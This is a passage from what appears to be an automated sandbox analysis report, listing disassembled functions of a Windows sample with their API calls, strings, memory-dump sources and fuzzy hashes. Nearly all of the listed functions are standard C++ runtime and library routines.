                                          • DName::DName.LIBVCRUNTIME ref: 00A5E49D
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E4C2
                                          • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00A5E502
                                          • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00A5E542
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E59D
                                          • DName::operator+.LIBCMT ref: 00A5E5B5
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E5DE
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E88E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Name::operator+Name::operator+=$Name$Name::$Decorator::get$Name::operator=$DimensionSigned$EncodingName::doPcharString$DataType
                                          • String ID: `anonymous namespace'$`string'$operator
                                          • API String ID: 2067090289-815891235
                                          • Opcode ID: a888781c17650d4cbe434380386cd63419c8eda324bfe63ebf4fd0311f36064a
                                          • Instruction ID: bc65a4e7a7618dcae67deadebc0559da85115e9b96562c2bc29f3335c0b17cd6
                                          • Opcode Fuzzy Hash: a888781c17650d4cbe434380386cd63419c8eda324bfe63ebf4fd0311f36064a
                                          • Instruction Fuzzy Hash: D502D1709002099FDF1CDFA4D995AFEBBB4BF19302F14045AE942A7191EB359B4ACB20
                                          Function 00A40623 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 86libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00AD87E8,00000FA0,21472377,?,?,?,?,00A8EEC0,000000FF), ref: 00A40652
                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A8EEC0,000000FF), ref: 00A4065D
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A8EEC0,000000FF), ref: 00A4066E
                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A40684
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A40692
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A406A0
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A406CB
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A406D6
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,00A8EEC0,000000FF), ref: 00A406F9
                                          • ___scrt_fastfail.LIBCMT ref: 00A4070A
                                          • DeleteCriticalSection.KERNEL32(00AD87E8,00000007,?,?,?,?,00A8EEC0,000000FF), ref: 00A40715
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00A8EEC0,000000FF), ref: 00A40725
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AddressHandleProc$CriticalModuleSection__crt_fast_encode_pointer$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll$w#G!
                                          • API String ID: 2634751764-1939041831
                                          • Opcode ID: f28df31353aa8ced61e7fac7dad6c57169bea6b74f1f6f398c67a1461f351a07
                                          • Instruction ID: 512d989b11ea8170b15aaaa4371a4e1afef1a878943df05f75bf9624531f014e
                                          • Opcode Fuzzy Hash: f28df31353aa8ced61e7fac7dad6c57169bea6b74f1f6f398c67a1461f351a07
                                          • Instruction Fuzzy Hash: AA21D636741711BBCF119BF4AD49E2AB7E8EB85B51F100626FA02D6290DEB88C018664
                                          Function 00A6CC29 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID: w#G!
                                          • API String ID: 2509303402-519468572
                                          • Opcode ID: 714dc79c2dd8a1cfcb2f58ff189db313063b39f73a2043177d95eb0797935b6d
                                          • Instruction ID: fb7a5a479a1fc25aebded8279feb28963fc3bd268d7e971b4d2de16dcf326d1a
                                          • Opcode Fuzzy Hash: 714dc79c2dd8a1cfcb2f58ff189db313063b39f73a2043177d95eb0797935b6d
                                          • Instruction Fuzzy Hash: AAB19D719003059FDB21DFA8C881BFEBBF5BF09310F14816AF499A7292DB75A941CB60
                                          Function 00A5E8CA Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 155COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00A5E901
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E912
                                          • DName::operator+=.LIBCMT ref: 00A5E920
                                          • UnDecorator::getPtrRefType.LIBCMT ref: 00A5E952
                                          • operator+.LIBVCRUNTIME ref: 00A5E973
                                          • UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00A5E9D0
                                          • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00A5E9D9
                                          • UnDecorator::getPtrRefDataType.LIBVCRUNTIME ref: 00A5E9F1
                                          • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00A5EA2D
                                          • operator+.LIBVCRUNTIME ref: 00A5EA4E
                                          • DName::DName.LIBVCRUNTIME ref: 00A5EA60
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5EA8B
                                          • DName::operator+=.LIBCMT ref: 00A5EA99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Decorator::get$Type$Data$BasicNameName::operator+=Name::operator=operator+$IndirectName::Scoped
                                          • String ID: std::nullptr_t$std::nullptr_t $volatile
                                          • API String ID: 2673590388-294867888
                                          • Opcode ID: fb0b8d3a1b8591447a36190d74e3cdd341aae16ab4a7e726e029acc9b16dfbb4
                                          • Instruction ID: 77fd4611d8b7fcc6d1f7da066fd269064f2610789e2e473a7f1d977b16a42390
                                          • Opcode Fuzzy Hash: fb0b8d3a1b8591447a36190d74e3cdd341aae16ab4a7e726e029acc9b16dfbb4
                                          • Instruction Fuzzy Hash: C951D171900208EFCB28DF69C9458AAFFB5FF05742B14455AFC0696266EB36CB4ECB50
                                          Function 00A3F250 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 176COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,21472377), ref: 00A3F2F4
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3F309
                                          • ResetEvent.KERNEL32(00000000,21472377), ref: 00A3F313
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A3F37D
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3F392
                                          • SetEvent.KERNEL32(00000000), ref: 00A3F3A1
                                          • CloseHandle.KERNEL32(00000000,21472377), ref: 00A3F3BB
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,21472377), ref: 00A3F412
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3F427
                                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,21472377), ref: 00A3F439
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Event$CloseHandle$Create$ObjectOpenResetSingleWait
                                          • String ID: w#G!
                                          • API String ID: 3951656645-519468572
                                          • Opcode ID: 997a5b263d4fa3144d674f67e8951c9764b353966ecd5253ffd260b377e8d93b
                                          • Instruction ID: bdb471c8296b7a4e729623926c8ab1121c20aabd5f713e5a52bd08bd82b8c61d
                                          • Opcode Fuzzy Hash: 997a5b263d4fa3144d674f67e8951c9764b353966ecd5253ffd260b377e8d93b
                                          • Instruction Fuzzy Hash: 34617C75D15358AFDF21CBE5C945B9EB7B4AF05714F24422AF828AB281C770AD05CB90
                                          Function 00A7CF89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 561e0a6e6cccad94f580a2573a19e1c3f3f591df82545b0bea86f5859c1181ef
                                          • Instruction ID: 0448eb8a87d40730757b0acc71db7080ec967d5714a37f69b1f4a92c5e8850bf
                                          • Opcode Fuzzy Hash: 561e0a6e6cccad94f580a2573a19e1c3f3f591df82545b0bea86f5859c1181ef
                                          • Instruction Fuzzy Hash: 32C114B2E40205BBDB20DBA8CD42FDE77F8AF59710F14C165FA49FB282D6709A418761
                                          Function 00A3EAF0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 258COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEvent.KERNEL32(00000000,21472377), ref: 00A3EB69
                                          • SetEvent.KERNEL32(00000000,21472377), ref: 00A3EBC6
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000,21472377), ref: 00A3EBDA
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00A3EBFF
                                          • CloseHandle.KERNEL32(?), ref: 00A3EC33
                                          • SetEvent.KERNEL32(00000000), ref: 00A3EC70
                                            • Part of subcall function 009B50A0: CreateEventA.KERNEL32(?,?,?,?,21472377,w#G!w#G!,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000), ref: 009B50D4
                                            • Part of subcall function 009B50A0: CloseHandle.KERNEL32(00000000,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000,21472377,21472377), ref: 009B50EF
                                          • SetEvent.KERNEL32(00000000,?,21472377), ref: 00A3ECF8
                                          • CloseHandle.KERNEL32(?,21472377), ref: 00A3ED26
                                          • CloseHandle.KERNEL32(?,21472377), ref: 00A3EE03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Event$CloseHandle$ReleaseSemaphore$Create
                                          • String ID: w#G!
                                          • API String ID: 573037752-519468572
                                          • Opcode ID: a59120b5490e64e29ed8bdbf2112caa44ef21ff24693959443c28b54acc14b2c
                                          • Instruction ID: afdfb9e8f9ee767adfb7b82b5bbbbbca809aa964afe13104f5ebcf3645389588
                                          • Opcode Fuzzy Hash: a59120b5490e64e29ed8bdbf2112caa44ef21ff24693959443c28b54acc14b2c
                                          • Instruction Fuzzy Hash: F8A1BC75A002099FDF15DF68C98476EBBB4FF44328F244259E809AB291DB35EE46CBD0
                                          Function 00A24D70 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 131COMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00A24DAA
                                          • GetLastError.KERNEL32(0000000A), ref: 00A24DD5
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A24E16
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CounterErrorException@8LastPerformanceQueryThrow
                                          • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error $w#G!$w#G!
                                          • API String ID: 651023626-2759988153
                                          • Opcode ID: e508c746072669fb60aacb471d5998c291d0b11db0e43d7c92a09262eb248a3b
                                          • Instruction ID: cdf964c58a5ec20768bba3525ce0cf30ddb5360a6e5e475f81e21c08d6d62142
                                          • Opcode Fuzzy Hash: e508c746072669fb60aacb471d5998c291d0b11db0e43d7c92a09262eb248a3b
                                          • Instruction Fuzzy Hash: 65415F75A04348EBDB10DFE8DD45F9EB7B8FB08700F10466AF906A7281DB78A905CB51
                                          Function 00A5A5D6 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00A5A6D1
                                          • ___TypeMatch.LIBVCRUNTIME ref: 00A5A803
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00A5A8CD
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A5A92B
                                          • _UnwindNestedFrames.LIBCMT ref: 00A5A94F
                                          • CallUnexpected.LIBVCRUNTIME ref: 00A5A96A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionSpec$CallException@8FramesMatchNestedThrowTypeUnexpectedUnwind
                                          • String ID: csm$csm$csm
                                          • API String ID: 2291861386-393685449
                                          • Opcode ID: 8b60f631ac0d8b6b47c32bc0b9596b8ae98b57c4268130c0e4dd8720fadee165
                                          • Instruction ID: b4f4c0b282cccfe4a6ba471e51069fa9f1ca0fe5d02cfd129646b32a3074c251
                                          • Opcode Fuzzy Hash: 8b60f631ac0d8b6b47c32bc0b9596b8ae98b57c4268130c0e4dd8720fadee165
                                          • Instruction Fuzzy Hash: 92B1CE31E00219EFCF15DFA4D981AAEBBB5FF28312F14425AEC15AB201D331D959CB92
                                          Function 00A12730 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 179COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A10AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10B9E
                                            • Part of subcall function 00A10AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10C09
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A127C4
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A1282E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_type_info_name$Name___un
                                          • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent$ThisObject:
                                          • API String ID: 3683324773-4091968653
                                          • Opcode ID: 035b5193fc7c3aee2eafca7bf3cb88da2776c8f3ee8b69b029b5430136b875c8
                                          • Instruction ID: 64cc554c2503430d121b18021d381acd3cf36e65c4cf92aade8bed6da4000406
                                          • Opcode Fuzzy Hash: 035b5193fc7c3aee2eafca7bf3cb88da2776c8f3ee8b69b029b5430136b875c8
                                          • Instruction Fuzzy Hash: 4D61C470604741AFC711EF74C956B9BBBF5BF81300F004A19F1A55B2A1EBB1D998CB92
                                          Function 00A3CF40 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 149COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::locale::_Init.LIBCPMT ref: 00A3CF70
                                            • Part of subcall function 00A289F6: __EH_prolog3.LIBCMT ref: 00A289FD
                                            • Part of subcall function 00A289F6: std::_Lockit::_Lockit.LIBCPMT ref: 00A28A08
                                            • Part of subcall function 00A289F6: std::locale::_Setgloballocale.LIBCPMT ref: 00A28A23
                                            • Part of subcall function 00A289F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00A28A79
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A3CFAC
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A3CFF4
                                          • __Getcvt.LIBCPMT ref: 00A3D001
                                            • Part of subcall function 009B2A30: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009B2A56
                                            • Part of subcall function 009B2A30: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2AEA
                                          • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00A3D044
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A3D064
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A3D085
                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A3D094
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$std::locale::_$Lockit::_Lockit::~_$Locimp::_Locinfo::_$AddfacGetcvtH_prolog3InitLocimpLocimp_Locinfo_ctorLocinfo_dtorNew_Setgloballocale
                                          • String ID: w#G!
                                          • API String ID: 1428944335-519468572
                                          • Opcode ID: 0887bf020b99f56c95cb26e29ea67da22c236f954526df56272fc87ae4932b45
                                          • Instruction ID: ba1f5a74094a4d1280fd278fbe0bbd0686722c6e6c62af7ac4adbf49a6d1e79c
                                          • Opcode Fuzzy Hash: 0887bf020b99f56c95cb26e29ea67da22c236f954526df56272fc87ae4932b45
                                          • Instruction Fuzzy Hash: EE51FF70C01748DFDB20DFA8D9417AEBBB4FF11304F10426AE815AB292EB74AA45CB91
                                          Function 00A4A00F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A4A05B
                                          • SwitchToThread.KERNEL32(?), ref: 00A4A07E
                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A4A09D
                                          • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00A4A0B9
                                          • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00A4A0C4
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4A0EB
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4A0F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextException@8InternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadThrowstd::invalid_argument::invalid_argument
                                          • String ID: count$ppVirtualProcessorRoots
                                          • API String ID: 3409498682-3650809737
                                          • Opcode ID: e5dd0544b1cde51cb9f6f0fda57dc6851b251005c365a0d030352ccd7034f668
                                          • Instruction ID: a33686195a4a835436f5b58e862ae91395a74270b034e387cb51cbe90e50e55c
                                          • Opcode Fuzzy Hash: e5dd0544b1cde51cb9f6f0fda57dc6851b251005c365a0d030352ccd7034f668
                                          • Instruction Fuzzy Hash: 40217E78A40209AFCF14EFA5D585ABEBBB4BFD9354F4040A9E905AB251CB30AE05CB51
                                          Function 00A54AA2 Relevance: 15.1, APIs: 10, Instructions: 69threadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00A54AB8
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54ACA
                                          • GetCurrentThread.KERNEL32 ref: 00A54AD2
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54ADA
                                          • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00A48A12,00000000,00000000,00000002,?,?,?,?,?,00A4896E,?,?,?), ref: 00A54AF3
                                          • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00A54B14
                                            • Part of subcall function 00A42DA4: ___crtCreateThreadpoolTimer.LIBCPMT ref: 00A42DB0
                                            • Part of subcall function 00A42DA4: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00A42DBE
                                            • Part of subcall function 00A42DA4: ___crtSetThreadpoolWait.LIBCPMT ref: 00A42DD0
